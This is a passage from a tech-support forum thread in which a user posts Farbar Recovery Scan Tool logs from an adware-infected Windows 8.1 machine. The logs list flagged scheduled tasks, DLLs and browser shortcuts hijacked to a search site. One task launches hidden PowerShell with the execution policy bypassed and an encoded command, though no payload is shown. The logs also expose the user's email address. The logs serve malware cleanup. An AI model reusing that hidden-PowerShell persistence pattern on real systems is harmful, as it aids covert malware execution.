    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\PolicyDefinitions
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Defender
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
    2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
    2015-12-09 13:34 - 2015-12-05 23:20 - 00000000 ____D C:\Windows\system32\MRT
    2015-12-09 13:27 - 2015-12-05 23:20 - 140158008 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

    ==================== Files in the root of some directories =======

    2014-10-10 07:45 - 2014-10-09 17:10 - 27674200 _____ () C:\Program Files (x86)\Roboscan_IS_Free.exe
    2015-05-01 20:00 - 2015-12-20 01:43 - 0000132 _____ () C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs
    2015-12-28 23:01 - 2015-12-28 23:02 - 0001282 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log
    2015-12-28 23:01 - 2015-12-28 23:02 - 0005761 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log
    2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log
    2015-12-28 23:01 - 2015-12-28 23:01 - 0000097 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log
    2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log
    2015-12-28 22:57 - 2015-12-28 22:57 - 0009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
    2015-04-08 10:52 - 2015-04-08 10:52 - 0002493 _____ () C:\Users\hersheychoco9\AppData\Local\recently-used.xbel
    2015-12-28 22:57 - 2015-12-28 22:57 - 0002560 _____ () C:\Users\hersheychoco9\AppData\Local\uninstall.exe
    2014-05-13 21:05 - 2014-05-13 21:05 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
    2015-12-28 23:16 - 2015-12-28 23:16 - 0001520 _____ () C:\ProgramData\tempimage.bmp

    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\system32\winlogon.exe => File is digitally signed
    C:\Windows\system32\wininit.exe => File is digitally signed
    C:\Windows\explorer.exe => File is digitally signed
    C:\Windows\SysWOW64\explorer.exe => File is digitally signed
    C:\Windows\system32\svchost.exe => File is digitally signed
    C:\Windows\SysWOW64\svchost.exe => File is digitally signed
    C:\Windows\system32\services.exe => File is digitally signed
    C:\Windows\system32\User32.dll => File is digitally signed
    C:\Windows\SysWOW64\User32.dll => File is digitally signed
    C:\Windows\system32\userinit.exe => File is digitally signed
    C:\Windows\SysWOW64\userinit.exe => File is digitally signed
    C:\Windows\system32\rpcss.dll => File is digitally signed
    C:\Windows\system32\dnsapi.dll => File is digitally signed
    C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
    C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2015-12-20 22:31

    ==================== End of FRST.txt ============================
     
  6. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    Additional scan result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
    Ran by hersheychoco9 (2016-01-05 17:09:21)
    Running from D:\Utilities
    Windows 8.1 (X64) (2014-05-14 03:51:59)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-1030869394-3123877279-975090705-500 - Administrator - Disabled) => C:\Users\Administrator
    Guest (S-1-5-21-1030869394-3123877279-975090705-501 - Limited - Disabled)
    hersheychoco9 (S-1-5-21-1030869394-3123877279-975090705-1001 - Administrator - Enabled) => C:\Users\hersheychoco9

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Roboscan (Enabled - Up to date) {9D201895-DDC4-8A80-AD2D-06BCC9382E61}
    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: Roboscan (Enabled - Up to date) {2641F971-FBFE-850E-979D-3DCEB2BF64DC}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    FW: Roboscan (Enabled) {A51B99B0-97AB-8BD8-8672-AF8937EB691A}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.3.0.151 - Adobe Systems Incorporated)
    Adobe Flash Professional CC 2015 (HKLM-x32\...\{31390329-FFF0-11E4-85AD-AF2C4143F080}) (Version: 15.0 - Adobe Systems Incorporated)
    Adobe Photoshop Elements 11 (HKLM-x32\...\Adobe Photoshop Elements 11) (Version: 11.0 - Adobe Systems Incorporated)
    Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
    Aliens versus Predator Classic 2000 (HKLM-x32\...\Steam App 3730) (Version: - Rebellion)
    Autodesk SketchBookExpress 2010 R1 (HKLM-x32\...\{426187BC-F500-4208-B3C1-96876EE7FA31}) (Version: 4.12.0001 - Autodesk)
    Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
    Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
    Castle Crashers (HKLM-x32\...\Steam App 204360) (Version: - The Behemoth)
    Color Efex Pro 3.0 Wacom Edition 6 (HKLM-x32\...\Color Efex Pro 3.0 Wacom Edition 6 Stand-Alone) (Version: 3.1.1.1 - Nik Software, Inc.)
    Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
    Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve)
    Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
    Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.7.5.63 - Dell Inc.)
    Dell Digital Delivery (HKLM-x32\...\{D850CB7E-72BC-4510-BA4F-48932BFAB295}) (Version: 2.9.901.0 - Dell Products, LP)
    Dell Product Registration (HKLM-x32\...\{764E68FE-C2F9-410E-90A8-CE7F8B9A36E2}) (Version: 2.03.0204 - Aviata Inc.)
    Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.1.6664.93 - Dell)
    Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 18.0.5.4 - Synaptics Incorporated)
    Dell Update (HKLM-x32\...\{C87ADBDA-EF36-4A53-B05C-DBCD98D3A2CA}) (Version: 1.4.2000.0 - Dell Inc.)
    Don't Starve Together Beta (HKLM-x32\...\Steam App 322330) (Version: - Klei Entertainment)
    Dragon Nest (HKLM-x32\...\Steam App 11610) (Version: - Eyedentity Games Inc.)
    Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    ffdshow [rev 3154] [2009-12-09] (HKLM-x32\...\ffdshow_is1) (Version: 1.0 - )
    Game Booster 3 (HKLM-x32\...\Game Booster_is1) (Version: 3.5 - IObit)
    Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
    GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
    Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
    Hammerwatch (HKLM-x32\...\Steam App 239070) (Version: - Crackshell)
    Hero Siege (HKLM-x32\...\Steam App 269210) (Version: - Elias Viglione)
    How to Survive (HKLM-x32\...\Steam App 250400) (Version: - )
    Insurgency (HKLM-x32\...\Steam App 222880) (Version: - New World Interactive)
    Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.22.1760 - Intel Corporation)
    Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3383 - Intel Corporation)
    Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology(patch version 3.0.1342.2) (HKLM\...\{302600C1-6BDF-4FD1-1311-148929CC1385}) (Version: 3.1.1311.0402 - Intel Corporation)
    Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.2.1000 - Intel Corporation)
    Intel® PROSet/Wireless Software (HKLM-x32\...\{6882ac6d-e97d-4e25-b3ea-5f3f21055dfe}) (Version: 16.6.0 - Intel Corporation)
    IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 4.3.0.5 - IObit)
    Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
    Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)
    Killing Floor (HKLM-x32\...\Steam App 1250) (Version: - Tripwire Interactive)
    Killing Floor 2 (HKLM-x32\...\Steam App 232090) (Version: - Tripwire Interactive)
    League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
    League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
    Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version: - DONTNOD Entertainment)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Motorola Mobile Drivers Installation 6.4.0 (HKLM\...\{27986EDD-C9EC-4B52-B92F-06D073F0AA52}) (Version: 6.4.0 - Motorola Mobility LLC)
    MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
    My Game Long Name (HKLM\...\UDK-cf0a7b04-8d44-4d89-bebf-60876b806bed) (Version: - Epic Games, Inc.)
    Nicole (otome version) (HKLM-x32\...\Steam App 307190) (Version: - Winter Wolves)
    NVIDIA PhysX (HKLM-x32\...\{B455E95A-B804-439F-B533-336B1635AE97}) (Version: 9.14.0702 - NVIDIA Corporation)
    OpenAL (HKLM-x32\...\OpenAL) (Version: - )
    Outlast (HKLM-x32\...\Steam App 238320) (Version: - Red Barrels)
    PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)
    Pool Component (HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\{D8814471-E92F-6B47-10E9-0AD81C4D3361}) (Version: 1.6.5 - Beach Download corp) <==== ATTENTION
    PSE11 STI Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 10.16.007 - Dell Inc.)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7152 - Realtek Semiconductor Corp.)
    Risk of Rain (HKLM-x32\...\Steam App 248820) (Version: - )
    Roboscan Internet Security (HKLM\...\Roboscan_is1) (Version: v2.5 - Roboscan Inc.)
    Scribblenauts Unlimited (HKLM-x32\...\Steam App 218680) (Version: - 5th Cell Media)
    SdRt4200 (HKLM-x32\...\{140347A0-4A0C-44FC-9CA1-C8A3471899B7}) (Version: 4.2.8.0 - パルティオソフト株式会社)
    Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATTENTION
    Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
    Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
    Star Wars Jedi Knight: Jedi Academy (HKLM-x32\...\Steam App 6020) (Version: - Raven Software)
    Starbound (HKLM-x32\...\Steam App 211820) (Version: - )
    State of Decay (HKLM-x32\...\Steam App 241540) (Version: - Undead Labs)
    Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
    The Witcher 2: Assassins of Kings Enhanced Edition (HKLM-x32\...\Steam App 20920) (Version: - CD PROJEKT RED)
    TOXIKK (HKLM-x32\...\Steam App 324810) (Version: - Reakktor Studios)
    Unturned (HKLM-x32\...\Steam App 304930) (Version: - Nelson Sexton)
    Update for Japanese Microsoft IME Postal Code Dictionary (HKLM-x32\...\{15015752-9990-4516-A2B1-93823281FB8E}) (Version: 15.0.1759 - Microsoft Corporation)
    Update for Japanese Microsoft IME Standard Dictionary (HKLM-x32\...\{E75B82FD-B6FD-4653-8685-F3A97BDFEA6E}) (Version: 15.0.2013 - Microsoft Corporation)
    Update for Japanese Microsoft IME Standard Extended Dictionary (HKLM-x32\...\{01E87699-A49D-413A-B75B-7C434FEF979C}) (Version: 15.0.2013 - Microsoft Corporation)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    Vuze (HKLM\...\8461-7759-5462-8226) (Version: 5.5.0.0 - Azureus Software, Inc.)
    Wacom (HKLM\...\Pen Tablet Driver) (Version: 5.3.5-3 - Wacom Technology Corp.)
    WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
    WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
    WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
    Wondershare MobileGo ( Version 8.0.0 ) (HKLM-x32\...\{1E04C795-7359-4E05-8A0E-5644F777AA09}_is1) (Version: 8.0.0 - Wondershare)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-1030869394-3123877279-975090705-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
     
  7. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27} - System32\Tasks\Pool Component => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll",#1 <==== ATTENTION
    Task: {1942C491-20D1-442F-BC74-6769F1D1280D} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
    Task: {1D1D0A16-ADA3-40B5-A257-8E6A372FF7F1} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-hershey99999@gmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-09-04] (Adobe Systems Incorporated)
    Task: {32CB8F3D-72E2-4F26-AF79-830A7A116864} - System32\Tasks\Easy Driver Pro Schedule => C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe
    Task: {3855C92B-1AB9-4877-B728-3E166A322521} - System32\Tasks\Genius_Interval => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] ()
    Task: {53C1C984-FAFA-45AF-A299-CC9D47FF50FC} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2015-10-29] (PC-Doctor, Inc.)
    Task: {63B79E46-FBBD-4C8A-B7AA-45C6731402FF} - System32\Tasks\IBUpd2 => C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe [2015-12-22] ()
    Task: {642B9DD6-2DA0-4C37-82B8-2B043D8E899E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
    Task: {75F57505-E997-49EF-8280-CBEDA94B26CE} - System32\Tasks\Seventh => C:\Users\hersheychoco9\AppData\Roaming\Seventh\Seventh.exe <==== ATTENTION
    Task: {7AF5A5D6-6314-46CE-A436-82522A94B518} - System32\Tasks\CCleanerSkipUAC => C:\Users\hersheychoco9\Desktop\Utilities\CCleaner\CCleaner.exe [2015-07-17] (Piriform Ltd)
    Task: {7BC0E46C-BFEC-438E-AFA4-ECE363145385} - System32\Tasks\Game_Booster_AutoUpdate => C:\Program Files (x86)\IObit\Game Booster 3\AutoUpdate.exe [2015-11-07] ()
    Task: {80113A5B-9EE2-4DF6-A1E6-7ED2A1C45754} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
    Task: {80FA20B2-A979-4EAB-9EBA-6D46F57955A1} - System32\Tasks\Genius => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] () <==== ATTENTION
    Task: {82DB69B4-7124-4705-AFC2-219F5EBB3241} - System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand
    Task: {86B9E75F-1889-49B5-B36A-35C70EC3D395} - System32\Tasks\Pool Component2 => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll",#1 <==== ATTENTION
    Task: {9BA7BA7E-1533-4B35-ABFE-16D2D5009E73} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2014-01-16] (Synaptics Incorporated)
    Task: {9CCB0C95-9CC9-4F2E-8D83-663775D82970} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
    Task: {B1D873D1-5121-42A0-9C92-76FBCD27335F} - System32\Tasks\Sixth => C:\Users\hersheychoco9\AppData\Roaming\Sixth\Sixth.exe [2015-12-10] () <==== ATTENTION
    Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
    Task: {CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611} - System32\Tasks\Ijufcyl => C:\PROGRA~1\SHOPPE~1\Osifch.bat
    Task: {D07CC060-B787-4C15-B547-123801C27E3B} - System32\Tasks\Only-search Updater => C:\Windows\system32\wscript.exe [2014-10-28] (Microsoft Corporation) <==== ATTENTION
    Task: {F61341FC-B312-4A23-8F26-9CB5191CF5BF} - System32\Tasks\SushiLeads => C:\Program Files (x86)\sushileads\ScheduledTask.exe
    Task: {F911CADE-3A34-4F78-B0C3-0F67C227D535} - System32\Tasks\Dell\Dell Product Registration => /boot /LSRC=autolaunch
    Task: {F93F7DEF-97E1-4486-951F-083F68C4E7B3} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2015-10-29] (PC-Doctor, Inc.)
    Task: {FB55E3BB-58E9-4918-98BC-AE9BBBD84928} - System32\Tasks\ASC8_SkipUac_hersheychoco9 => D:\Utilities\Advanced SystemCare 8\ASC.exe [2015-06-16] (IObit)
    Task: {FC206518-4BBD-4AAE-92C6-10454002C453} - System32\Tasks\Uninstaller_SkipUac_hersheychoco9 => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2015-05-20] (IObit)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\Windows\Tasks\ASC8_SkipUac_hersheychoco9.job => D:\Utilities\Advanced SystemCare 8\ASC.exe
    Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\Windows\Tasks\Uninstaller_SkipUac_hersheychoco9.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ShortcutWithArgument: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27,
    ShortcutWithArgument: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27,
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27, --disable-quic
    ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27, --disable-quic

    ==================== Loaded Modules (Whitelisted) ==============

    2015-12-28 23:08 - 2015-12-28 22:01 - 00768368 _____ () C:\Windows\system32\Comvud64.dll
    2015-09-11 18:02 - 2015-09-11 18:02 - 00803488 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
    2015-04-16 16:55 - 2014-08-19 13:12 - 01356568 _____ () C:\Program Files\Tablet\Pen\libxml2.dll
    2015-12-28 23:08 - 2015-12-22 12:03 - 00342016 _____ () C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
    2014-09-18 13:37 - 2014-07-02 21:55 - 00487144 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe
    2015-09-21 21:29 - 2014-10-16 09:26 - 00622880 _____ () C:\Program Files (x86)\IObit\LiveUpdate\ProductStatistics.dll
    2015-12-28 23:04 - 2015-12-28 23:04 - 00028160 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll
    2015-12-28 23:04 - 2015-12-28 23:04 - 00012800 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll
    2015-12-28 23:04 - 2015-12-28 23:04 - 00011264 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\{A2C49E11-7252-8301-FEB0-5D3FFF9EA4C3}.dat
    2015-12-28 22:57 - 2015-12-28 22:57 - 00009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
    2015-09-21 21:29 - 2013-01-15 17:48 - 00348992 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madExcept_.bpl
    2015-09-21 21:29 - 2013-01-15 17:48 - 00183616 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madBasic_.bpl
    2015-09-21 21:29 - 2013-01-15 17:48 - 00051008 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madDisAsm_.bpl
    2014-05-13 21:32 - 2013-12-18 11:53 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
    2014-09-18 13:37 - 2014-07-30 17:37 - 01906464 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
    2014-05-13 21:40 - 2012-11-25 23:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
    2014-09-18 13:37 - 2012-11-25 23:19 - 00117608 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll
    2015-12-16 21:07 - 2015-12-10 21:54 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll
    2015-12-16 21:07 - 2015-12-10 21:54 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Roboscan_UpdSrv => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Roboscan_UpdSrv => ""="Service"

    ==================== EXE Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)


    There are 4788 more sites.


    ==================== Hosts content: ===============================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2013-08-22 07:25 - 2015-12-29 14:05 - 00000831 ____A C:\Windows\system32\Drivers\etc\hosts

    # ::1 localhost

    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
    DNS Servers: 208.87.151.17 - 208.87.151.16
